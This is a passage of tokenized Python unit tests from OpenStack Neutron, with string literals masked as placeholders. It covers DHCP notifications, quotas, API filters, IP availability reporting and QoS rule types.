<EOL> self . 
_resource_op_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_network_update_notifer ( self ) : <EOL> self . _resource_op_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class DHCPNotificationTest ( APIv2TestBase ) : <EOL> def setUp ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False , group = '<STR_LIT>' ) <EOL> super ( DHCPNotificationTest , self ) . setUp ( ) <EOL> def _test_dhcp_notifier ( self , opname , resource , initial_input = None ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = initial_input <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> expected_code = exc . HTTPCreated . code <EOL> with mock . patch . object ( dhcp_rpc_agent_api . DhcpAgentNotifyAPI , <EOL> '<STR_LIT>' ) as dhcp_notifier : <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , <EOL> initial_input ) <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . put_json ( <EOL> _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> initial_input ) <EOL> expected_code = exc . HTTPOk . code <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . delete ( _get_path ( '<STR_LIT>' , id = _uuid ( ) ) ) <EOL> expected_code = exc . HTTPNoContent . code <EOL> expected_item = mock . call ( mock . ANY , mock . ANY , <EOL> resource + "<STR_LIT:.>" + opname + "<STR_LIT>" ) <EOL> if initial_input and resource not in initial_input : <EOL> resource += '<STR_LIT:s>' <EOL> num = len ( initial_input [ resource ] ) if initial_input and isinstance ( <EOL> initial_input [ resource ] , list ) else <NUM_LIT:1> <EOL> expected = [ expected_item for x in moves . range ( num ) ] <EOL> self . assertEqual ( expected , dhcp_notifier . call_args_list ) <EOL> self . assertEqual ( num , dhcp_notifier . call_count ) <EOL> self . assertEqual ( expected_code , res . 
status_int ) <EOL> def test_network_create_dhcp_notifer ( self ) : <EOL> input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' , input ) <EOL> def test_network_delete_dhcp_notifer ( self ) : <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_network_update_dhcp_notifer ( self ) : <EOL> input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' , input ) <EOL> def test_networks_create_bulk_dhcp_notifer ( self ) : <EOL> input = { '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } ] } <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' , input ) <EOL> class QuotaTest ( APIv2TestBase ) : <EOL> def setUp ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False , group = '<STR_LIT>' ) <EOL> super ( QuotaTest , self ) . setUp ( ) <EOL> replacement_registry = resource_registry . ResourceRegistry ( ) <EOL> registry_patcher = mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> mock_registry = registry_patcher . start ( ) . return_value <EOL> mock_registry . get_resource = replacement_registry . get_resource <EOL> mock_registry . resources = replacement_registry . resources <EOL> replacement_registry . register_resource_by_name ( '<STR_LIT>' ) <EOL> def test_create_network_quota ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : [ ] } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:1> <EOL> res = self . api . 
post_json ( <EOL> _get_path ( '<STR_LIT>' ) , initial_input , expect_errors = True ) <EOL> instance . get_networks_count . assert_called_with ( mock . ANY , <EOL> filters = mock . ANY ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> res . json [ '<STR_LIT>' ] [ '<STR_LIT:message>' ] ) <EOL> def test_create_network_quota_no_counts ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : [ ] } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks_count . side_effect = ( <EOL> NotImplementedError ( ) ) <EOL> instance . get_networks . return_value = [ "<STR_LIT:foo>" ] <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , initial_input , expect_errors = True ) <EOL> instance . get_networks_count . assert_called_with ( mock . ANY , <EOL> filters = mock . ANY ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> res . json [ '<STR_LIT>' ] [ '<STR_LIT:message>' ] ) <EOL> def test_create_network_quota_without_limit ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , - <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> instance = self . plugin . return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:3> <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , initial_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> class ExtensionTestCase ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False , group = '<STR_LIT>' ) <EOL> super ( ExtensionTestCase , self ) . setUp ( ) <EOL> plugin = '<STR_LIT>' <EOL> extensions . PluginAwareExtensionManager . 
_instance = None <EOL> self . useFixture ( tools . AttributeMapMemento ( ) ) <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( plugin ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , EXTDIR ) <EOL> self . _plugin_patcher = mock . patch ( plugin , autospec = True ) <EOL> self . plugin = self . _plugin_patcher . start ( ) <EOL> manager . NeutronManager . get_plugin ( ) . supported_extension_aliases = ( <EOL> [ "<STR_LIT>" ] ) <EOL> api = router . APIRouter ( ) <EOL> self . api = webtest . TestApp ( api ) <EOL> quota . QUOTAS . _driver = None <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> super ( ExtensionTestCase , self ) . tearDown ( ) <EOL> self . api = None <EOL> self . plugin = None <EOL> def test_extended_create ( self ) : <EOL> net_id = _uuid ( ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) , <EOL> '<STR_LIT>' : "<STR_LIT:abc>" } } <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False } } <EOL> data [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> return_value = { '<STR_LIT>' : [ ] , '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT:id>' : net_id , <EOL> '<STR_LIT>' : "<STR_LIT>" } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post_json ( _get_path ( '<STR_LIT>' ) , initial_input ) <EOL> instance . create_network . assert_called_with ( mock . ANY , <EOL> network = data ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> self . assertIn ( '<STR_LIT>' , res . json ) <EOL> net = res . json [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> self . 
assertEqual ( "<STR_LIT>" , net [ '<STR_LIT>' ] ) <EOL> self . assertNotIn ( '<STR_LIT>' , net ) <EOL> class TestSubresourcePlugin ( object ) : <EOL> def get_network_dummies ( self , context , network_id , <EOL> filters = None , fields = None ) : <EOL> return [ ] <EOL> def get_network_dummy ( self , context , id , network_id , <EOL> fields = None ) : <EOL> return { } <EOL> def create_network_dummy ( self , context , network_id , dummy ) : <EOL> return { } <EOL> def update_network_dummy ( self , context , id , network_id , dummy ) : <EOL> return { } <EOL> def delete_network_dummy ( self , context , id , network_id ) : <EOL> return <EOL> def mactions ( self , context , id , network_id ) : <EOL> return <EOL> class ListArgsTestCase ( base . BaseTestCase ) : <EOL> def test_list_args ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> expect_val = [ '<STR_LIT:2>' , '<STR_LIT:4>' ] <EOL> actual_val = api_common . list_args ( request , '<STR_LIT>' ) <EOL> self . assertEqual ( expect_val , sorted ( actual_val ) ) <EOL> def test_list_args_with_empty ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> self . assertEqual ( [ ] , api_common . list_args ( request , '<STR_LIT>' ) ) <EOL> class FiltersTestCase ( base . BaseTestCase ) : <EOL> def test_all_skip_args ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> self . assertEqual ( { } , api_common . get_filters ( request , None , <EOL> [ "<STR_LIT>" ] ) ) <EOL> def test_blank_values ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> self . assertEqual ( { } , api_common . get_filters ( request , { } ) ) <EOL> def test_no_attr_info ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . 
blank ( path ) <EOL> expect_val = { '<STR_LIT:foo>' : [ '<STR_LIT:4>' ] , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:2>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , { } ) <EOL> self . assertEqual ( expect_val , actual_val ) <EOL> def test_attr_info_without_conversion ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> attr_info = { '<STR_LIT:foo>' : { '<STR_LIT:key>' : '<STR_LIT>' } } <EOL> expect_val = { '<STR_LIT:foo>' : [ '<STR_LIT:4>' ] , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:2>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , attr_info ) <EOL> self . assertEqual ( expect_val , actual_val ) <EOL> def test_attr_info_with_convert_list_to ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> attr_info = { <EOL> '<STR_LIT:foo>' : { <EOL> '<STR_LIT>' : converters . convert_kvp_list_to_dict , <EOL> } <EOL> } <EOL> expect_val = { '<STR_LIT:foo>' : { '<STR_LIT:key>' : [ '<STR_LIT:2>' , '<STR_LIT:4>' ] } , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , attr_info ) <EOL> self . assertOrderedEqual ( expect_val , actual_val ) <EOL> def test_attr_info_with_convert_to ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> attr_info = { '<STR_LIT:foo>' : { '<STR_LIT>' : converters . convert_to_int } } <EOL> expect_val = { '<STR_LIT:foo>' : [ <NUM_LIT:4> ] , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:2>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , attr_info ) <EOL> self . assertEqual ( expect_val , actual_val ) <EOL> class CreateResourceTestCase ( base . BaseTestCase ) : <EOL> def test_resource_creation ( self ) : <EOL> resource = v2_base . 
create_resource ( '<STR_LIT>' , '<STR_LIT>' , None , { } ) <EOL> self . assertIsInstance ( resource , webob . dec . wsgify ) </s>
<s> import neutron . api . extensions as api_ext <EOL> import neutron . common . config as config <EOL> import neutron . common . constants as constants <EOL> import neutron . extensions <EOL> import neutron . services . network_ip_availability . plugin as plugin_module <EOL> import neutron . tests . unit . db . test_db_base_plugin_v2 as test_db_base_plugin_v2 <EOL> API_RESOURCE = '<STR_LIT>' <EOL> IP_AVAIL_KEY = '<STR_LIT>' <EOL> IP_AVAILS_KEY = '<STR_LIT>' <EOL> EXTENSIONS_PATH = '<STR_LIT::>' . join ( neutron . extensions . __path__ ) <EOL> PLUGIN_NAME = '<STR_LIT>' % ( plugin_module . NetworkIPAvailabilityPlugin . __module__ , <EOL> plugin_module . NetworkIPAvailabilityPlugin . __name__ ) <EOL> class TestNetworkIPAvailabilityAPI ( <EOL> test_db_base_plugin_v2 . NeutronDbPluginV2TestCase ) : <EOL> def setUp ( self ) : <EOL> svc_plugins = { '<STR_LIT>' : PLUGIN_NAME } <EOL> super ( TestNetworkIPAvailabilityAPI , self ) . setUp ( <EOL> service_plugins = svc_plugins ) <EOL> self . plugin = plugin_module . NetworkIPAvailabilityPlugin ( ) <EOL> ext_mgr = api_ext . PluginAwareExtensionManager ( <EOL> EXTENSIONS_PATH , { "<STR_LIT>" : self . plugin } <EOL> ) <EOL> app = config . load_paste_app ( '<STR_LIT>' ) <EOL> self . ext_api = api_ext . ExtensionMiddleware ( app , ext_mgr = ext_mgr ) <EOL> def _validate_availability ( self , network , availability , expected_used_ips , <EOL> expected_total_ips = <NUM_LIT> ) : <EOL> self . assertEqual ( network [ '<STR_LIT:name>' ] , availability [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( network [ '<STR_LIT:id>' ] , availability [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_used_ips , availability [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_total_ips , availability [ '<STR_LIT>' ] ) <EOL> def _validate_from_availabilities ( self , availabilities , wrapped_network , <EOL> expected_used_ips , <EOL> expected_total_ips = <NUM_LIT> ) : <EOL> network = wrapped_network [ '<STR_LIT>' ] <EOL> availability = self . 
_find_availability ( availabilities , network [ '<STR_LIT:id>' ] ) <EOL> self . assertIsNotNone ( availability ) <EOL> self . _validate_availability ( network , availability , <EOL> expected_used_ips = expected_used_ips , <EOL> expected_total_ips = expected_total_ips ) <EOL> @ staticmethod <EOL> def _find_availability ( availabilities , net_id ) : <EOL> for ip_availability in availabilities : <EOL> if net_id == ip_availability [ '<STR_LIT>' ] : <EOL> return ip_availability <EOL> def test_basic ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) : <EOL> network = net [ '<STR_LIT>' ] <EOL> request = self . new_list_request ( API_RESOURCE , self . fmt ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> request = self . new_show_request ( API_RESOURCE , network [ '<STR_LIT:id>' ] ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAIL_KEY , response ) <EOL> usage = response [ IP_AVAIL_KEY ] <EOL> self . _validate_availability ( network , usage , <NUM_LIT:0> ) <EOL> def test_usages_multi_nets_subnets ( self ) : <EOL> with self . network ( name = '<STR_LIT>' ) as n1 , self . network ( name = '<STR_LIT>' ) as n2 , self . network ( name = '<STR_LIT>' ) as n3 : <EOL> with self . subnet ( network = n1 ) as subnet1_1 , self . subnet ( cidr = '<STR_LIT>' , network = n3 ) as subnet3_1 : <EOL> with self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet3_1 ) , self . port ( subnet = subnet3_1 ) : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> response = self . 
deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> data = response [ IP_AVAILS_KEY ] <EOL> self . _validate_from_availabilities ( data , n1 , <NUM_LIT:3> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( data , n2 , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . _validate_from_availabilities ( data , n3 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> network = n1 [ '<STR_LIT>' ] <EOL> request = self . new_show_request ( API_RESOURCE , <EOL> network [ '<STR_LIT:id>' ] ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAIL_KEY , response ) <EOL> self . _validate_availability ( network , <EOL> response [ IP_AVAIL_KEY ] , <NUM_LIT:3> , <NUM_LIT> ) <EOL> def test_usages_multi_nets_subnets_sums ( self ) : <EOL> with self . network ( name = '<STR_LIT>' ) as n1 : <EOL> with self . subnet ( network = n1 ) as subnet1_1 , self . subnet ( cidr = '<STR_LIT>' , network = n1 ) as subnet1_2 : <EOL> with self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet1_2 ) , self . port ( subnet = subnet1_2 ) : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> n1 , <NUM_LIT:3> , <NUM_LIT> ) <EOL> network = n1 [ '<STR_LIT>' ] <EOL> request = self . new_show_request ( API_RESOURCE , <EOL> network [ '<STR_LIT:id>' ] ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAIL_KEY , response ) <EOL> self . 
_validate_availability ( network , <EOL> response [ IP_AVAIL_KEY ] , <NUM_LIT:3> , <NUM_LIT> ) <EOL> def test_usages_port_consumed_v4 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) as subnet : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> with self . port ( subnet = subnet ) , self . port ( subnet = subnet ) : <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( <EOL> self . ext_api ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:2> ) <EOL> def test_usages_query_ip_version_v4 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) : <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_query_ip_version_v6 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( <EOL> network = net , cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> , <EOL> ipv6_address_mode = constants . DHCPV6_STATELESS ) : <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . 
_validate_from_availabilities ( <EOL> response [ IP_AVAILS_KEY ] , net , <NUM_LIT:0> , <NUM_LIT> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_ports_consumed_v6 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( <EOL> network = net , cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> , <EOL> ipv6_address_mode = constants . DHCPV6_STATELESS ) as subnet : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> with self . port ( subnet = subnet ) , self . port ( subnet = subnet ) , self . port ( subnet = subnet ) : <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:3> , <EOL> <NUM_LIT> ) <EOL> def test_usages_query_network_id ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) : <EOL> network = net [ '<STR_LIT>' ] <EOL> test_id = network [ '<STR_LIT:id>' ] <EOL> params = '<STR_LIT>' % test_id <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . 
assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_query_network_name ( self ) : <EOL> test_name = '<STR_LIT>' <EOL> with self . network ( name = test_name ) as net : <EOL> with self . subnet ( network = net ) : <EOL> params = '<STR_LIT>' % test_name <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_query_tenant_id ( self ) : <EOL> test_tenant_id = '<STR_LIT>' <EOL> with self . network ( tenant_id = test_tenant_id ) as net : <EOL> with self . subnet ( network = net ) : <EOL> params = '<STR_LIT>' % test_tenant_id <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> for net_avail in response [ IP_AVAILS_KEY ] : <EOL> self . assertEqual ( test_tenant_id , net_avail [ '<STR_LIT>' ] ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . 
assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_multi_net_multi_subnet_46 ( self ) : <EOL> with self . network ( name = '<STR_LIT>' ) as net_v6_1 , self . network ( name = '<STR_LIT>' ) as net_v6_2 , self . network ( name = '<STR_LIT>' ) as net_v4_1 , self . network ( name = '<STR_LIT>' ) as net_v4_2 : <EOL> with self . subnet ( network = net_v6_1 , cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> ) as s61 , self . subnet ( network = net_v6_2 , <EOL> cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> ) as s62 , self . subnet ( network = net_v4_1 , cidr = '<STR_LIT>' ) as s41 , self . subnet ( network = net_v4_2 , cidr = '<STR_LIT>' ) as s42 : <EOL> with self . port ( subnet = s61 ) , self . port ( subnet = s62 ) , self . port ( subnet = s62 ) , self . port ( subnet = s41 ) , self . port ( subnet = s42 ) , self . port ( subnet = s42 ) : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> avails_list = response [ IP_AVAILS_KEY ] <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v6_1 , <NUM_LIT:1> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v6_2 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v4_1 , <NUM_LIT:1> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v4_2 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> for ip_ver in [ <NUM_LIT:4> , <NUM_LIT:6> ] : <EOL> params = '<STR_LIT>' % ip_ver <EOL> request = self . new_list_request ( API_RESOURCE , <EOL> params = params ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> for net_avail in response [ IP_AVAILS_KEY ] : <EOL> for sub in net_avail [ '<STR_LIT>' ] : <EOL> self . assertEqual ( ip_ver , sub [ '<STR_LIT>' ] ) <EOL> request = self . 
new_list_request ( <EOL> API_RESOURCE , <EOL> params = '<STR_LIT>' <EOL> % ( net_v4_2 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> net_v6_2 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> avails_list = response [ IP_AVAILS_KEY ] <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v6_2 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v4_2 , <NUM_LIT:2> , <NUM_LIT> ) </s>
<s> import mock <EOL> from neutron import manager <EOL> from neutron . objects . qos import rule_type <EOL> from neutron . services . qos import qos_consts <EOL> from neutron . tests import base as test_base <EOL> DB_PLUGIN_KLASS = '<STR_LIT>' <EOL> class QosRuleTypeObjectTestCase ( test_base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( DB_PLUGIN_KLASS ) <EOL> super ( QosRuleTypeObjectTestCase , self ) . setUp ( ) <EOL> def test_get_objects ( self ) : <EOL> core_plugin = manager . NeutronManager . get_plugin ( ) <EOL> rule_types_mock = mock . PropertyMock ( <EOL> return_value = qos_consts . VALID_RULE_TYPES ) <EOL> with mock . patch . object ( core_plugin , '<STR_LIT>' , <EOL> new_callable = rule_types_mock , <EOL> create = True ) : <EOL> types = rule_type . QosRuleType . get_objects ( ) <EOL> self . assertEqual ( sorted ( qos_consts . VALID_RULE_TYPES ) , <EOL> sorted ( type_ [ '<STR_LIT:type>' ] for type_ in types ) ) <EOL> def test_wrong_type ( self ) : <EOL> self . assertRaises ( ValueError , rule_type . QosRuleType , type = '<STR_LIT>' ) </s>
<s> from oslo_config import cfg <EOL> from neutron . common import utils as n_utils <EOL> from neutron . plugins . ml2 . drivers . mech_sriov . agent . common import config <EOL> from neutron . plugins . ml2 . drivers . mech_sriov . agent import sriov_nic_agent as agent <EOL> from neutron . tests import base <EOL> class TestSriovAgentConfig ( base . BaseTestCase ) : <EOL> EXCLUDE_DEVICES_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES_LIST_INVALID = [ '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES_WITH_SPACES_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES_WITH_SPACES_ERROR = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES = { '<STR_LIT>' : set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : set ( [ '<STR_LIT>' ] ) } <EOL> DEVICE_MAPPING_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> DEVICE_MAPPING_WITH_ERROR_LIST = [ '<STR_LIT>' 